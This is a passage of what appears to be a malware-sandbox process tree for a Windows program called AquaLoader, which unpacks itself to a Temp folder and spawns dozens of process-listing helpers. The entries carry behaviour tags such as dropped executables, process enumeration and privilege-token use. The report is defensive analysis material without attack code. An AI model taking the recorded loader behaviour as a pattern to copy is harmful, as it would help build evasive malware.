  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
  2⤵
  PID:1840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4504

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2836

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5940

C:\Users\Admin\Downloads\AquaLoader\AquaLoader.exe
"C:\Users\Admin\Downloads\AquaLoader\AquaLoader.exe"
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1524
- C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\AquaLoader.exe
  C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\AquaLoader.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3544
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1556
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\AquaLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\AquaLoader.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\birthrates" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1768 --field-trial-handle=1772,i,10865411714246979313,1007916002762170579,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1524 get ExecutablePath"
    3⤵
    PID:4500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where processid=1524 get ExecutablePath
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:964
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\AquaLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\AquaLoader.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\birthrates" --mojo-platform-channel-handle=1852 --field-trial-handle=1772,i,10865411714246979313,1007916002762170579,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2200
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1232
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1696
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4916
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4152
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5052
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:32
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:3152
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5448
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5312
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5320
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:5308
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:5340
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5348
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5360
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5368
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5372
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5748
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4156
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:5304
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4592
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:3256
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5956
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:6000
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:6132
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:2444
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:5968
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:5644
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5632
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5444
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:1276
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:3316
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:5656
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:6104
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:5616
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:5392
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5376
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:5512
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:5480
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:5124
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:4752
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:6088
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:2740
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:4400
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:3760
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:3852
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:4708
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:536
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:5784
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:4608
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:6156
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:6164
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:6180
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:6204
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:6220
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:6236
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:6252
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:6276
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:6292
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Executes dropped EXE
    PID:6312
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6332
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6348
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6368
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6392
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6412
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
